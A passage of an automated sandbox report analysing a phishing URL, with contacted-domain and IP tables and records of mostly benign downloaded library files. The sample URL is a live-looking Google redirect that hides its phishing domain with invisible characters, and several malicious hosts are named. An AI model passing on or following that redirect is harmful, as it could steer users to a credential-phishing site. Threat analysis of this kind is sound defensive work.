                                                                                                                    high
                                                                                                                    https://promisesaplus.com/#point-57chromecache_65.2.dr, chromecache_62.2.drfalse
                                                                                                                      high
                                                                                                                      https://github.com/eslint/eslint/issues/3229chromecache_65.2.dr, chromecache_62.2.drfalse
                                                                                                                        high
                                                                                                                        https://getbootstrap.com/)chromecache_60.2.dr, chromecache_57.2.drfalse
                                                                                                                          high
                                                                                                                          https://wikis.world/chromecache_58.2.drfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          unknown
                                                                                                                          https://promisesaplus.com/#point-54chromecache_65.2.dr, chromecache_62.2.drfalse
                                                                                                                            high
                                                                                                                            https://html.spec.whatwg.org/multipage/forms.html#category-listedchromecache_65.2.dr, chromecache_62.2.drfalse
                                                                                                                              high
                                                                                                                              https://html.spec.whatwg.org/multipage/scripting.html#selector-disabledchromecache_65.2.dr, chromecache_62.2.drfalse
                                                                                                                                high
                                                                                                                                https://developer.mozilla.org/en-US/docs/CSS/displaychromecache_65.2.dr, chromecache_62.2.drfalse
                                                                                                                                  high
                                                                                                                                  https://jquery.org/licensechromecache_65.2.dr, chromecache_62.2.drfalse
                                                                                                                                    high
                                                                                                                                    https://jquery.com/chromecache_65.2.dr, chromecache_62.2.drfalse
                                                                                                                                      high
                                                                                                                                      https://getbootstrap.com)chromecache_69.2.dr, chromecache_70.2.dr, chromecache_63.2.drfalse
                                                                                                                                        high
                                                                                                                                        https://upload.wikimedia.org/wikipedia/donate/1/14/Wikimedia_Foundation_logo_-_wordmark.svgchromecache_58.2.drfalse
                                                                                                                                          high
                                                                                                                                          https://bugs.webkit.org/show_bug.cgi?id=137337chromecache_65.2.dr, chromecache_62.2.drfalse
                                                                                                                                            high
                                                                                                                                            https://html.spec.whatwg.org/multipage/scripting.html#selector-enabledchromecache_65.2.dr, chromecache_62.2.drfalse
                                                                                                                                              high
                                                                                                                                              https://github.com/twbs/bootstrap/blob/master/LICENSE)chromecache_69.2.dr, chromecache_70.2.dr, chromecache_60.2.dr, chromecache_63.2.dr, chromecache_57.2.drfalse
                                                                                                                                                high
                                                                                                                                                https://promisesaplus.com/#point-48chromecache_65.2.dr, chromecache_62.2.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://github.com/jquery/sizzle/pull/225chromecache_65.2.dr, chromecache_62.2.drfalse
                                                                                                                                                    high
                                                                                                                                                    https://bugs.jquery.com/ticket/4833chromecache_65.2.dr, chromecache_62.2.drfalse
                                                                                                                                                      high
                                                                                                                                                      https://github.com/whatwg/html/issues/2369chromecache_65.2.dr, chromecache_62.2.drfalse
                                                                                                                                                        high
                                                                                                                                                        https://sizzlejs.com/chromecache_65.2.dr, chromecache_62.2.drfalse
                                                                                                                                                          high
                                                                                                                                                          https://bugs.chromium.org/p/chromium/issues/detail?id=449857chromecache_65.2.dr, chromecache_62.2.drfalse
                                                                                                                                                            high
                                                                                                                                                            https://js.foundation/chromecache_65.2.dr, chromecache_62.2.drfalse
                                                                                                                                                              high
                                                                                                                                                              https://bugs.jquery.com/ticket/13393chromecache_65.2.dr, chromecache_62.2.drfalse
                                                                                                                                                                high
                                                                                                                                                                • No. of IPs < 25%
                                                                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                                                                • 75% < No. of IPs
                                                                                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                104.17.24.14
                                                                                                                                                                cdnjs.cloudflare.comUnited States
                                                                                                                                                                13335CLOUDFLARENETUSfalse
                                                                                                                                                                104.18.10.207
                                                                                                                                                                stackpath.bootstrapcdn.comUnited States
                                                                                                                                                                13335CLOUDFLARENETUSfalse
                                                                                                                                                                172.217.17.67
                                                                                                                                                                www.google.co.krUnited States
                                                                                                                                                                15169GOOGLEUSfalse
                                                                                                                                                                87.120.114.172
                                                                                                                                                                nova-drive.xkndniwljldraoauu.comBulgaria
                                                                                                                                                                25206UNACS-AS-BG8000BurgasBGtrue
                                                                                                                                                                142.250.181.100
                                                                                                                                                                www.google.comUnited States
                                                                                                                                                                15169GOOGLEUSfalse
                                                                                                                                                                104.18.11.207
                                                                                                                                                                maxcdn.bootstrapcdn.comUnited States
                                                                                                                                                                13335CLOUDFLARENETUSfalse
                                                                                                                                                                239.255.255.250
                                                                                                                                                                unknownReserved
                                                                                                                                                                unknownunknownfalse
                                                                                                                                                                185.15.58.226
                                                                                                                                                                wikipedia.comNetherlands
                                                                                                                                                                14907WIKIMEDIAUSfalse
                                                                                                                                                                151.101.194.137
                                                                                                                                                                code.jquery.comUnited States
                                                                                                                                                                54113FASTLYUSfalse
                                                                                                                                                                87.121.86.72
                                                                                                                                                                hmf1bnz.slfpgqqwzuxppnscs.comBulgaria
                                                                                                                                                                34577SKATTV-ASBGfalse
                                                                                                                                                                104.17.25.14
                                                                                                                                                                unknownUnited States
                                                                                                                                                                13335CLOUDFLARENETUSfalse
                                                                                                                                                                185.15.58.224
                                                                                                                                                                dyna.wikimedia.orgNetherlands
                                                                                                                                                                14907WIKIMEDIAUSfalse
                                                                                                                                                                IP
                                                                                                                                                                192.168.2.4
                                                                                                                                                                Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                Analysis ID:1561575
                                                                                                                                                                Start date and time:2024-11-23 20:34:46 +01:00
                                                                                                                                                                Joe Sandbox product:CloudBasic
                                                                                                                                                                Overall analysis duration:0h 3m 7s
                                                                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                                                                Report type:full
                                                                                                                                                                Cookbook file name:browseurl.jbs
                                                                                                                                                                Sample URL:https://www.google.co.kr/url?url=https://hrtyuytitwagtxswxzqxpcm&jtdm=hjstxxb&qhwocq=elw&vrszx=mrursi&rtz=qksmlok&sdyxm=kxlpun&hnkj=iujyvng&vochgqf=ylsd&pkhfd=vyifcj&nymdhak=ffn&ylzv=xpddvxaj&zoadnebgoj=rccejsmuqd&q=amp/hmf1bnz.s%C2%ADlf%C2%ADpg%C2%ADq%C2%ADq%C2%ADwzu%C2%ADx%C2%ADppns%C2%ADc%C2%ADs%C2%AD.com%E2%80%8B/n7brnx1iy&lbgq=ihcrvpx&isffrcc=xjcvvbbd&hokv=buitobfj&nfzezydbgm=lhtjhglyxx&pjwu=tdsgcse&cesnzrb=ekoykarj&ifpv=yabmwecd&acyeqkflup=bacwibnnwl&dovx=vqvcdxk&rwbvdtj=khlezois&efgx=ktfpexjt&iqggbgjmwh=cvqmvfdelx&gqsh=ghsdgye&hipceti=hpqeesqk&hkvbucxuvo=drwoirzwsq&dril=qbpemxo&xziwtam=tdvywqlj&nndiwyldry=kjqbehmdbj&kqef=faiqetj&peigggc=vbyfdxky&fstmbbtmkx=rjxugltfmc&rpws=borxqez&rijvxqj=ntedqhtd&wohxxxgtmq=jpiozpkrbp&cxah=gcmtksp&tzidqah=syxnwioo&szzishkfke=xmnmodwwoc&xmif=xdxtrqz&ajzcojq=fmtqkshw&gkmh=vmwdknp&xvlhpuf=zkhqqziq&rvfh=igbqint&gdnzlky=hyzlhjke&dqkq=ophpttl&yoamsuz=cuykisoc&frzr=lajcnwi&chdmjpw=hymhkhbw&wnxy=zwkomqb&duxkrfq=asjrwcgu&fzya=hrpcnke&hxrusxm=foudbois&yqgm=uhfvxoo&uynyplq=iryzkatx&qfzs=stmleud&vkbxzkf=hxgbjzit&dnro=vjxntck&kfrldgj=vpyfihbn&nsko=sdzidzb&unudtuz=mnvrwokv&lisf=zxdfari&tdyzrah=otrtzuun&rfza=trokalr&vkfduyc=wpwvnxpe&jjsq=pgkbofh&uatnbjp=gtwiypfq&zilu=kagobvs&jqfufkw=bckrzetp&tjng=jgmmmod&fvdtpsk=vlyzfjep&mgoi=fklhysh&llyljdv=jxpogtdn&gcjv=vjlzkuf&erlhvti=peuprtov&kbxk=jviffkg&lklbxhl=uhzpnzfw&upaw=gfmiehp&ismxijp=hmwbsmgj&zdkc=kodikna&njllvzf=oodglyrw&urdk=cktezyn&vmqhwgh=kqcbhffu&riqy=tlnbqzr&nmlgrkn=inyeynzg&vebu=pwpghzr&ckpmyoc=tmeufjen&otic=svrqsdo&tbwzub
                                                                                                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                Number of analysed new started processes analysed:8
                                                                                                                                                                Number of new started drivers analysed:0
                                                                                                                                                                Number of existing processes analysed:0
                                                                                                                                                                Number of existing drivers analysed:0
                                                                                                                                                                Number of injected processes analysed:0
                                                                                                                                                                Technologies:
                                                                                                                                                                • HCA enabled
                                                                                                                                                                • EGA enabled
                                                                                                                                                                • AMSI enabled
                                                                                                                                                                Analysis Mode:default
                                                                                                                                                                Analysis stop reason:Timeout
                                                                                                                                                                Detection:MAL
                                                                                                                                                                Classification:mal56.phis.win@17/26@36/13
                                                                                                                                                                EGA Information:Failed
                                                                                                                                                                HCA Information:
                                                                                                                                                                • Successful, ratio: 100%
                                                                                                                                                                • Number of executed functions: 0
                                                                                                                                                                • Number of non-executed functions: 0
                                                                                                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                                                • Excluded IPs from analysis (whitelisted): 172.217.19.227, 172.217.17.46, 74.125.205.84, 34.104.35.123, 199.232.210.172, 172.217.19.170, 192.229.221.95, 152.199.19.161, 142.250.181.131, 142.250.181.138, 142.250.181.42, 172.217.19.202, 172.217.19.10, 172.217.19.234, 172.217.17.42, 142.250.181.10, 172.217.17.74, 172.217.17.35
                                                                                                                                                                • Excluded domains from analysis (whitelisted): fonts.googleapis.com, fs.microsoft.com, spoppe-b.ec.azureedge.net, accounts.google.com, content-autofill.googleapis.com, slscr.update.microsoft.com, otelrules.azureedge.net, fonts.gstatic.com, ctldl.windowsupdate.com, clientservices.googleapis.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, spoppe-b.azureedge.net, update.googleapis.com, clients.l.google.com, cs9.wpc.v0cdn.net
                                                                                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                • VT rate limit hit for: https://www.google.co.kr/url?url=https://hrtyuytitwagtxswxzqxpcm&jtdm=hjstxxb&qhwocq=elw&vrszx=mrursi&rtz=qksmlok&sdyxm=kxlpun&hnkj=iujyvng&vochgqf=ylsd&pkhfd=vyifcj&nymdhak=ffn&ylzv=xpddvxaj&zoadnebgoj=rccejsmuqd&q=amp/hmf1bnz.s%C2%ADlf%C2%ADpg%C2%ADq%C2%ADq%C2%ADwzu%C2%ADx%C2%ADppns%C2%ADc%C2%ADs%C2%AD.com%E2%80%8B/n7brnx1iy&lbgq=ihcrvpx&isffrcc=xjcvvbbd&hokv=buitobfj&nfzezydbgm=lhtjhglyxx&pjwu=tdsgcse&cesnzrb=ekoykarj&ifpv=yabmwecd&acyeqkflup=bacwibnnwl&dovx=vqvcdxk&rwbvdtj=khlezois&efgx=ktfpexjt&iqggbgjmwh=cvqmvfdelx&gqsh=ghsdgye&hipceti=hpqeesqk&hkvbucxuvo=drwoirzwsq&dril=qbpemxo&xziwtam=tdvywqlj&nndiwyldry=kjqbehmdbj&kqef=faiqetj&peigggc=vbyfdxky&fstmbbtmkx=rjxugltfmc&rpws=borxqez&rijvxqj=ntedqhtd&wohxxxgtmq=jpiozpkrbp&cxah=gcmtksp&tzidqah=syxnwioo&szzishkfke=xmnmodwwoc&xmif=xdxtrqz&ajzcojq=fmtqkshw&gkmh=vmwdknp&xvlhpuf=zkhqqziq&rvfh=igbqint&gdnzlky=hyzlhjke&dqkq=ophpttl&yoamsuz=cuykisoc&frzr=lajcnwi&chdmjpw=hymhkhbw&wnxy=zwkomqb&duxkrfq=asjrwcgu&fzya=hrpcnke&hxrusxm=foudbois&yqg
                                                                                                                                                                No simulations
                                                                                                                                                                No context
                                                                                                                                                                No context
                                                                                                                                                                No context
                                                                                                                                                                No context
                                                                                                                                                                No context
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with very long lines (19015)
                                                                                                                                                                Category:downloaded
                                                                                                                                                                Size (bytes):19188
                                                                                                                                                                Entropy (8bit):5.212814407014048
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:384:+CbuG4xGNoDic2UjKPafxwC5b/4xQviOJU7QzxzivDdE3pcGdjkd/9jt3B+Kb964:zb4xGmiJfaf7gxQvVU7eziv+cSjknZ3f
                                                                                                                                                                MD5:70D3FDA195602FE8B75E0097EED74DDE
                                                                                                                                                                SHA1:C3B977AA4B8DFB69D651E07015031D385DED964B
                                                                                                                                                                SHA-256:A52F7AA54D7BCAAFA056EE0A050262DFC5694AE28DEE8B4CAC3429AF37FF0D66
                                                                                                                                                                SHA-512:51AFFB5A8CFD2F93B473007F6987B19A0A1A0FB970DDD59EF45BD77A355D82ABBBD60468837A09823496411E797F05B1F962AE93C725ED4C00D514BA40269D14
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                URL:https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js
                                                                                                                                                                Preview:/*. Copyright (C) Federico Zivolo 2017. Distributed under the MIT License (license terms are at http://opensource.org/licenses/MIT).. */(function(e,t){'object'==typeof exports&&'undefined'!=typeof module?module.exports=t():'function'==typeof define&&define.amd?define(t):e.Popper=t()})(this,function(){'use strict';function e(e){return e&&'[object Function]'==={}.toString.call(e)}function t(e,t){if(1!==e.nodeType)return[];var o=getComputedStyle(e,null);return t?o[t]:o}function o(e){return'HTML'===e.nodeName?e:e.parentNode||e.host}function n(e){if(!e)return document.body;switch(e.nodeName){case'HTML':case'BODY':return e.ownerDocument.body;case'#document':return e.body;}var i=t(e),r=i.overflow,p=i.overflowX,s=i.overflowY;return /(auto|scroll)/.test(r+s+p)?e:n(o(e))}function r(e){var o=e&&e.offsetParent,i=o&&o.nodeName;return i&&'BODY'!==i&&'HTML'!==i?-1!==['TD','TABLE'].indexOf(o.nodeName)&&'static'===t(o,'position')?r(o):o:e?e.ownerDocument.documentElement:document.documentElement}functio
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                Category:downloaded
                                                                                                                                                                Size (bytes):28
                                                                                                                                                                Entropy (8bit):4.137537511266052
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:G4iC1Y:ziC1Y
                                                                                                                                                                MD5:C41A026A97DFC107025EEC7F45F29C85
                                                                                                                                                                SHA1:B77C8FE6D6A770AF1758FC34B3E716656B8F2485
                                                                                                                                                                SHA-256:8A7130BC862841606D062AC516513B01EB176CEF37D017E18B54E844E8390029
                                                                                                                                                                SHA-512:6DE72788DA933F3DA0D1FB315335B8DE1BD9D4F7B59A0F1D1F6E758AB0D1EC3D7F0B8FFCDE16313B555BFE18832FF8671A2159F5AFCEEA6C45C2A037345ED017
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISFwnn3PfgdgYblRIFDVNVgbUSBQ2tCa6x?alt=proto
                                                                                                                                                                Preview:ChIKBw1TVYG1GgAKBw2tCa6xGgA=
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with very long lines (50758)
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):51039
                                                                                                                                                                Entropy (8bit):5.247253437401007
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:768:E9Yw7GuJM+HV0cen/7Kh5rM7V4RxCKg8FW/xsXQUd+FiID65r48Hgp5HRl+:E9X7PMIM7V4R5LFAxTWyuHHgp5HRl+
                                                                                                                                                                MD5:67176C242E1BDC20603C878DEE836DF3
                                                                                                                                                                SHA1:27A71B00383D61EF3C489326B3564D698FC1227C
                                                                                                                                                                SHA-256:56C12A125B021D21A69E61D7190CEFA168D6C28CE715265CEA1B3B0112D169C4
                                                                                                                                                                SHA-512:9FA75814E1B9F7DB38FE61A503A13E60B82D83DB8F4CE30351BD08A6B48C0D854BAF472D891AF23C443C8293380C2325C7B3361B708AF9971AA0EA09A25CDD0A
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview:/*!. * Bootstrap v4.1.3 (https://getbootstrap.com/). * Copyright 2011-2018 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors). * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE). */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?e(exports,require("jquery"),require("popper.js")):"function"==typeof define&&define.amd?define(["exports","jquery","popper.js"],e):e(t.bootstrap={},t.jQuery,t.Popper)}(this,function(t,e,h){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(t,i.key,i)}}function s(t,e,n){return e&&i(t.prototype,e),n&&i(t,n),t}function l(r){for(var t=1;t<arguments.length;t++){var o=null!=arguments[t]?arguments[t]:{},e=Object.keys(o);"function"==typeof Object.getOwnPropertySymbols&&(e=e.concat(Object.getOwnPropertySymbols(o).filter(function(t){return Object.getOwnPropertyDescriptor(o,t).enum
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (41278)
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):99998
                                                                                                                                                                Entropy (8bit):5.526314059730624
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:1536:WKHwz3j2383MA83MwBlf0hUCKnpzIcfIQ4emzKFme/yasqY:WOBlf0hUhxp/ylqY
                                                                                                                                                                MD5:4E1E8F7EE18988B525960859AB1C2ECE
                                                                                                                                                                SHA1:320ADF2CAD3C89269CE86FC0C1B0FF6E93A98DDC
                                                                                                                                                                SHA-256:073844E96E543F2638B47C119FF7109FFABDEC9F7D28CB87D2A1AFF3D1A731F2
                                                                                                                                                                SHA-512:55CCE7B2253242E79ADC6D8B9C457C0D10C99C59EFD60E6FA94239C290DD6C83434DEA3E27732165736EFBCC24A85CAED7DCAD30D8A60ECE0C47F3350FF3F448
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview:<!DOCTYPE html>.<html lang="en" class="no-js">.<head>.<meta charset="utf-8">.<title>Wikipedia</title>.<meta name="description" content="Wikipedia is a free online encyclopedia, created and edited by volunteers around the world and hosted by the Wikimedia Foundation.">.<script>.document.documentElement.className = document.documentElement.className.replace( /(^|\s)no-js(\s|$)/, "$1js-enabled$2" );.</script>.<meta name="viewport" content="initial-scale=1,user-scalable=yes">.<link rel="apple-touch-icon" href="/static/apple-touch/wikipedia.png">.<link rel="shortcut icon" href="/static/favicon/wikipedia.ico">.<link rel="license" href="//creativecommons.org/licenses/by-sa/4.0/">.<style>..sprite{background-image:linear-gradient(transparent,transparent),url(portal/wikipedia.org/assets/img/sprite-de847d1a.svg);background-repeat:no-repeat;display:inline-block;vertical-align:middle}.svg-Commons-logo_sister{background-position:0 0;width:47px;height:47px}.svg-MediaWiki-logo_sister{background-positi
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                Category:downloaded
                                                                                                                                                                Size (bytes):16
                                                                                                                                                                Entropy (8bit):3.625
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:H14iCRn:OiCR
                                                                                                                                                                MD5:D30EC88A92EBE1582BD4C13A132360B4
                                                                                                                                                                SHA1:0770036F4E9DD49CCE47A5B59C817E3926698C5A
                                                                                                                                                                SHA-256:2CD8956257D6C6C0EBDD804A9713E205C5B52947D902F1836132847C09219DCD
                                                                                                                                                                SHA-512:01E854207C742E1AF854DD97ED1D783368CB0A52C8001703FF3D69D8062B346BFC91A811C7E354F26C03408FE803A76B2C17DCDED8951FF7DBE2C6E9250E1335
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISEAngSjOrGkhGQhIFDVNVgbU=?alt=proto
                                                                                                                                                                Preview:CgkKBw1TVYG1GgA=
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with very long lines (50758)
                                                                                                                                                                Category:downloaded
                                                                                                                                                                Size (bytes):51039
                                                                                                                                                                Entropy (8bit):5.247253437401007
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:768:E9Yw7GuJM+HV0cen/7Kh5rM7V4RxCKg8FW/xsXQUd+FiID65r48Hgp5HRl+:E9X7PMIM7V4R5LFAxTWyuHHgp5HRl+
                                                                                                                                                                MD5:67176C242E1BDC20603C878DEE836DF3
                                                                                                                                                                SHA1:27A71B00383D61EF3C489326B3564D698FC1227C
                                                                                                                                                                SHA-256:56C12A125B021D21A69E61D7190CEFA168D6C28CE715265CEA1B3B0112D169C4
                                                                                                                                                                SHA-512:9FA75814E1B9F7DB38FE61A503A13E60B82D83DB8F4CE30351BD08A6B48C0D854BAF472D891AF23C443C8293380C2325C7B3361B708AF9971AA0EA09A25CDD0A
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                URL:https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js
                                                                                                                                                                Preview:/*!. * Bootstrap v4.1.3 (https://getbootstrap.com/). * Copyright 2011-2018 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors). * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE). */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?e(exports,require("jquery"),require("popper.js")):"function"==typeof define&&define.amd?define(["exports","jquery","popper.js"],e):e(t.bootstrap={},t.jQuery,t.Popper)}(this,function(t,e,h){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(t,i.key,i)}}function s(t,e,n){return e&&i(t.prototype,e),n&&i(t,n),t}function l(r){for(var t=1;t<arguments.length;t++){var o=null!=arguments[t]?arguments[t]:{},e=Object.keys(o);"function"==typeof Object.getOwnPropertySymbols&&(e=e.concat(Object.getOwnPropertySymbols(o).filter(function(t){return Object.getOwnPropertyDescriptor(o,t).enum
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):724
                                                                                                                                                                Entropy (8bit):7.514076977837575
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:6v/7OrtS5/EqbayGXMeB7XejSOl9QonnCvIVRrnN4rGR5+rShQZ+UuAoRN:vt4EqbRGXMeIOc9QSCvIbN4raIrShw43
                                                                                                                                                                MD5:EE8EFDF87B5EBA117950C000A1BA02F1
                                                                                                                                                                SHA1:960905CA27DA19652F649EA9F2CCDBF93A13B766
                                                                                                                                                                SHA-256:65D68F096EAE4D0FA0DBB74B245F94ABFBE00C8ED6236F8C66341EE028EBE008
                                                                                                                                                                SHA-512:DD7733377626AEB74D22A41CE28F3ADCD3FA4A45299A06519AA6F75DAEDCB0519B21ED8F51442BC353E54D9C601CD61060E12BF9CD13DAD0A6A3CC0408095011
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview:.PNG........IHDR...@...@......iq.....tEXtSoftware.Adobe ImageReadyq.e<...vIDATx...+DQ..1....).e....IX..(...?7....f..hj.YX....e.......P".....i6x..s...m..=.{.y.N.......e.....\:M..N..pt3vg.c.......1O7.Rf.ly<.26>....(..|tx0...%;3..j.......T.)..L`....b519.,...8D^.W.......Q.D@p...!8.........i.......SU.E@p.;............E...2...:..+...._i...pv..P.....W..8;dv..W.0.@..@..........C...n..h............X...`....5.k.......Y.~.zH..!..z......Y..hw^.@........|./Q...EO....V.....f... ......3.".....k#.|.]...e.b....w....Y.7.....<....l.L0_.F............y.jQ...3.....@.......X.-0..E....Y.@..4[a.....n....5.r..C.s!.].yC$........a.I.a..|.....OE?._...B.?..-]...R....3...K...fq,9.0A.P(...`....~.3.....IEND.B`.
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                Category:downloaded
                                                                                                                                                                Size (bytes):280364
                                                                                                                                                                Entropy (8bit):5.067215048941603
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6144:V0Hh4V/Y+TCtlIhTze/RZcYmDvzK8m/7EtPx+WI+Y7cFys/CL/+uQxN0IPfKuGAv:atZcYmDhOgPx+WI+Y7cFycuq1PfQAv5B
                                                                                                                                                                MD5:11C05EB286ED576526BF4543760785B9
                                                                                                                                                                SHA1:7FAA15A054093F3B5D674E63B6567C835A6FA217
                                                                                                                                                                SHA-256:5A93A88493AA32AAB228BF4571C01207D3B42B0002409A454D404B4D8395BD55
                                                                                                                                                                SHA-512:B096B9296AB717DF5039E8A350E9BD3BE0600E056DCEB58105A819B63956EC5DC8E3B34ED4E68D26F6EEB7EF4A38F9A336BE166F76E5538BD0890762F9993AC2
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                URL:https://code.jquery.com/jquery-3.4.1.js
                                                                                                                                                                Preview:/*!. * jQuery JavaScript Library v3.4.1. * https://jquery.com/. *. * Includes Sizzle.js. * https://sizzlejs.com/. *. * Copyright JS Foundation and other contributors. * Released under the MIT license. * https://jquery.org/license. *. * Date: 2019-05-01T21:04Z. */.( function( global, factory ) {..."use strict";...if ( typeof module === "object" && typeof module.exports === "object" ) {....// For CommonJS and CommonJS-like environments where a proper `window`...// is present, execute the factory and get jQuery....// For environments that do not have a `window` with a `document`...// (such as Node.js), expose a factory as module.exports....// This accentuates the need for the creation of a real `window`....// e.g. var jQuery = require("jquery")(window);...// See ticket #14549 for more info....module.exports = global.document ?....factory( global, true ) :....function( w ) {.....if ( !w.document ) {......throw new Error( "jQuery requires a window with a document" );.....}.....return factor
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with very long lines (65325)
                                                                                                                                                                Category:downloaded
                                                                                                                                                                Size (bytes):144877
                                                                                                                                                                Entropy (8bit):5.049937202697915
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:1536:GcoqwrUPyDHU7c7TcDEBi82NcuSELL4d/+oENM6HN26Q:VoPgPard2oENM6HN26Q
                                                                                                                                                                MD5:450FC463B8B1A349DF717056FBB3E078
                                                                                                                                                                SHA1:895125A4522A3B10EE7ADA06EE6503587CBF95C5
                                                                                                                                                                SHA-256:2C0F3DCFE93D7E380C290FE4AB838ED8CADFF1596D62697F5444BE460D1F876D
                                                                                                                                                                SHA-512:93BF1ED5F6D8B34F53413A86EFD4A925D578C97ABC757EA871F3F46F340745E4126C48219D2E8040713605B64A9ECF7AD986AA8102F5EA5ECF9228801D962F5D
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                URL:https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css
                                                                                                                                                                Preview:/*!. * Bootstrap v4.0.0 (https://getbootstrap.com). * Copyright 2011-2018 The Bootstrap Authors. * Copyright 2011-2018 Twitter, Inc.. * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE). */:root{--blue:#007bff;--indigo:#6610f2;--purple:#6f42c1;--pink:#e83e8c;--red:#dc3545;--orange:#fd7e14;--yellow:#ffc107;--green:#28a745;--teal:#20c997;--cyan:#17a2b8;--white:#fff;--gray:#6c757d;--gray-dark:#343a40;--primary:#007bff;--secondary:#6c757d;--success:#28a745;--info:#17a2b8;--warning:#ffc107;--danger:#dc3545;--light:#f8f9fa;--dark:#343a40;--breakpoint-xs:0;--breakpoint-sm:576px;--breakpoint-md:768px;--breakpoint-lg:992px;--breakpoint-xl:1200px;--font-family-sans-serif:-apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,"Helvetica Neue",Arial,sans-serif,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol";--font-family-monospace:SFMono-Regular,Menlo,Monaco,Consolas,"Liberation Mono","Courier New",monospace}*,::after,::before{box-sizing:border-box}html{font-family:sans
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:HTML document, ASCII text, with very long lines (27633)
                                                                                                                                                                Category:downloaded
                                                                                                                                                                Size (bytes):69191
                                                                                                                                                                Entropy (8bit):6.09840547016739
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:768:Jygg2Gb7DePy9CeAbFbVPe7ADz5Ed9yWlmcAfbW7gGOaYJdVOj/sUj/sYGvsA:kggv/MeAbFbVQ10WlmcATO3oJLO4U4xn
                                                                                                                                                                MD5:9ABB71BA3E13C3EDFD14E6B5F7F9BD77
                                                                                                                                                                SHA1:CCD208D48D8DF9F62445890CE253582A9FC7EF8A
